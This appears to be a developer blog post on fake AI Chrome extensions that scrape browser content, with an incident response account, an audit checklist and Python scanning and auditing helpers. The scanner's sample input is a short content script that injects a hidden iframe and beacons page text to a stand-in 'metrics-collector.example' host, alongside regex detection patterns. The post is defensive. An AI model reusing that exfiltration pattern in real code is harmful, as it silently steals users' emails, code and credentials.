Two weeks ago, one of my engineers mentioned he’d installed a Chrome extension called “AI Assistant Pro” to help summarize long GitHub PRs. Sounded reasonable — we all use AI tools constantly, and browser extensions feel like a natural fit. The reviews were decent, and it had about 40,000 installs.
Then our security team flagged unusual outbound requests from his machine during a routine audit.
The extension was quietly exfiltrating his browser content — including the GitHub session he was logged into, his email content when Gmail was open, and any API keys visible in browser tabs. It was one of 30+ carbon-copy malicious extensions that LayerX Security recently uncovered in the Chrome Web Store, all disguised as AI assistants.
How These Extensions Actually Work
The attack is embarrassingly simple, which is what makes it effective. According to LayerX’s research, all 30+ extensions share nearly identical codebases with superficial branding differences. Here’s the pattern:
They look legitimate. Clean landing pages, decent review counts (likely botted), names like “AI Page Assistant” or “Smart AI Helper.” Nothing screams scam at first glance.
They request broad permissions. “Read and change all your data on all websites” — which, to be fair, many legitimate extensions also request. Developers are desensitized to this prompt.
They actually provide basic AI functionality. Some of them wrap a free API (or just iframe a chatbot) so the user thinks it’s working. This is the clever part — if it “works,” you don’t question it.
They silently inject iframes. Behind the scenes, the extension loads hidden iframes that scrape page content — email bodies, code repositories, API dashboards, anything visible in your browser.
They exfiltrate to attacker-controlled servers. The scraped data gets sent to external endpoints, typically disguised as analytics or telemetry calls.
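The scrape-and-beacon pattern above is crude enough to catch with simple static heuristics. Here's a minimal sketch of a scanner you could run over an unpacked extension's JavaScript; the regexes and the sample content script are illustrative assumptions on my part, not LayerX's actual detection signatures:

```python
import re

# Heuristic patterns matching the LayerX-style behavior: hidden iframe
# injection plus "telemetry" beacons to hardcoded external hosts.
# Illustrative only; real scanners use far more robust analysis.
SUSPICIOUS_PATTERNS = {
    "hidden_iframe": re.compile(r"createElement\(['\"]iframe['\"]\)"),
    "offscreen_style": re.compile(r"(display\s*:\s*none|visibility\s*:\s*hidden|left\s*:\s*-\d{3,}px)"),
    "beacon_call": re.compile(r"(sendBeacon|fetch|XMLHttpRequest)\s*\("),
    "hardcoded_host": re.compile(r"https?://(?!chrome\.google\.com)[\w.-]+\.[a-z]{2,}/"),
}

def scan_source(js_source: str) -> list[str]:
    """Return the names of suspicious patterns found in extension JS."""
    return [name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(js_source)]

# Example input: a content script that injects an invisible iframe and
# beacons page text to an attacker-controlled "analytics" endpoint.
sample = """
const f = document.createElement('iframe');
f.style = 'display:none';
document.body.appendChild(f);
navigator.sendBeacon('https://metrics-collector.example/ingest', document.body.innerText);
"""
print(scan_source(sample))
```

Running this over each `.js` file in an unpacked extension directory won't catch obfuscated variants, but it flags exactly the lazy copy-paste pattern these 30+ clones share.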
The specific extensions LayerX found had collectively been installed by over 260,000 users. That’s 260,000 people whose browser sessions were potentially compromised.
Why Developers Are the Perfect Target
I used to think phishing attacks targeting developers would be obvious. We’re technical, we know about security, we should notice something weird. But these attacks exploit a specific blind spot:
Developers trust developer tools implicitly. We install CLI tools, VS Code extensions, npm packages, and browser extensions with barely a glance at the permissions. We’re conditioned to accept broad access requests because legitimate tools need them too. A code review extension does need to read your GitHub pages. An AI summarizer does need to read page content.
The attack surface for developers is enormous:
- GitHub/GitLab sessions with access to private repos
- Cloud provider consoles (AWS, GCP) with visible API keys
- CI/CD dashboards with deployment credentials
- Email containing password reset links and 2FA codes
- Slack/Teams with internal conversations
My engineer had his GitHub session, two cloud consoles, and Gmail open simultaneously. All of it was accessible to the malicious extension.
What We Did After Finding It
Here’s the incident response timeline (roughly 4 hours total):
Hour 1: Confirm and contain. Removed the extension, revoked the engineer’s GitHub tokens, rotated any API keys that had been visible in browser tabs. This was the panicky part.
Hour 2: Assess blast radius. Checked browser history to identify which sensitive pages were open during the period the extension was installed (about 11 days). Cross-referenced with the extension’s known exfiltration endpoints.
Hour 3: Rotate credentials. Rotated every credential that could have been visible — GitHub PATs, AWS access keys, a Vercel token, and his Google session. Changed passwords on anything accessed during those 11 days.
Hour 4: Team audit. Had every engineer on the team export their Chrome extension list. Found two more people with suspicious AI-branded extensions (different names, same pattern). Removed those too.
Total cost: about 16 person-hours of engineering time, plus the paranoia tax of not knowing exactly what was captured.
The 10-Minute Extension Audit You Should Do Right Now
Seriously, stop reading and do this:
- Open chrome://extensions/ in your browser
- For each extension, check:
  - Do you actually use it regularly? Remove anything you forgot you installed
  - When was it last updated? Abandoned extensions can be sold to malicious actors
  - What permissions does it have? Click “Details” → look at “Site access”
  - Is “Read and change all your data on all websites” really necessary?
- Search each extension name + “malware” or “security” — takes 30 seconds
- Check the developer/publisher — legitimate extensions are usually from known companies or developers with a track record
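Part of that checklist can be automated. As a rough sketch (the profile path and heuristics are my assumptions; Chrome's directory layout varies by OS, and some manifests use localized `__MSG_*__` names), this walks a profile's Extensions directory and flags anything with blanket host access:

```python
import json
from pathlib import Path

# Permission strings that grant access to every site you visit
BROAD_PERMS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}

def audit_extensions(ext_root: Path) -> list[dict]:
    """Walk a Chrome Extensions directory (one subdir per extension ID,
    each containing versioned folders with a manifest.json) and report
    name, version, and any broad host access."""
    findings = []
    for manifest_path in ext_root.glob("*/*/manifest.json"):
        manifest = json.loads(manifest_path.read_text(encoding="utf-8"))
        perms = set(manifest.get("permissions", [])) | set(manifest.get("host_permissions", []))
        findings.append({
            "name": manifest.get("name", "?"),
            "version": manifest.get("version", "?"),
            "broad_access": sorted(perms & BROAD_PERMS),
        })
    return findings

if __name__ == "__main__":
    # Typical path on Linux; macOS uses
    # ~/Library/Application Support/Google/Chrome/Default/Extensions
    root = Path.home() / ".config/google-chrome/Default/Extensions"
    for f in sorted(audit_extensions(root), key=lambda f: f["name"]):
        flag = "  !! BROAD ACCESS" if f["broad_access"] else ""
        print(f"{f['name']} {f['version']}{flag}")
```

A "BROAD ACCESS" flag isn't proof of malice (plenty of legitimate extensions need it), but it tells you exactly which installs deserve the manual scrutiny above.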
For AI-specific extensions, be extra skeptical of:
- Extensions with generic names (“AI Assistant,” “Smart AI Helper”)
- Extensions from unknown publishers with suspiciously high install counts
- Extensions that claim to work with multiple AI providers but don’t specify which APIs they use
- Extensions that request permissions beyond what their stated function requires
What I Changed on My Team
After this incident, I implemented three rules:
Rule 1: Extension allowlist. We now maintain a list of approved browser extensions. Want to install something new? Add it to a shared doc, someone else reviews it first. Yes, this is annoying. It’s also the only reliable control.
Rule 2: Separate browser profiles. Sensitive work (cloud consoles, production dashboards) happens in a browser profile with zero extensions. Everything else can happen in the regular profile. This limits the blast radius of any compromised extension.
Rule 3: Monthly audit. Once a month, everyone exports their extension list. Takes 5 minutes. We diff it against the previous month to catch new installs.
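The monthly diff itself is trivial to script. A minimal sketch, assuming each engineer's export is just a set of extension IDs (the IDs below are made-up placeholders, not real extensions):

```python
def diff_extension_lists(previous: set[str], current: set[str]) -> dict[str, set[str]]:
    """Compare last month's extension IDs against this month's export."""
    return {"added": current - previous, "removed": previous - current}

# Placeholder 32-character IDs for illustration only
last_month = {"aaaabbbbccccddddeeeeffffgggghhhh", "bbbbccccddddeeeeffffgggghhhhiiii"}
this_month = {"aaaabbbbccccddddeeeeffffgggghhhh", "ccccddddeeeeffffgggghhhhiiiijjjj"}

# Anything in "added" gets reviewed against the allowlist before it stays
print(diff_extension_lists(last_month, this_month))
```

Five minutes a month, and any new install shows up in "added" where a second pair of eyes can question it.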
These aren’t revolutionary ideas. They’re the browser equivalent of not running random npm packages as root — basic hygiene that most teams skip because it feels tedious.
Why This Will Get Worse Before It Gets Better
Here’s what bugs me most: the AI hype cycle has created a perfect storm for this kind of attack. Everyone wants AI tools. New ones launch daily. The Chrome Web Store’s review process can’t keep up. And developers — the people who should know better — are installing unvetted extensions because the productivity promise is too tempting.
We’ve written before about AI tool risks from a workflow perspective. But the security angle is harder to manage because the threat isn’t the AI tool doing something wrong — it’s the AI tool being a disguise for something malicious.
The same pattern exists in VS Code extensions, npm packages, and MCP servers. Anywhere developers install third-party code with broad access, attackers will follow. The MCP ecosystem fragmentation we covered recently makes this worse — more protocols, more integration points, more attack surface.
What to Watch For Next
LayerX found 30 extensions, but that’s almost certainly a fraction of the total. The economics are too good for attackers — build one scraper, reskin it 30 times, collect credentials from a quarter-million users. Expect this pattern to accelerate through 2026.
Google has started removing flagged extensions, but the Chrome Web Store’s reactive approach means malicious extensions often stay live for weeks or months before being caught. Don’t rely on Google to protect you.
The bottom line: Audit your extensions today. Set up a separate browser profile for sensitive work. And the next time an AI Chrome extension promises to “boost your productivity” — assume it’s lying until proven otherwise.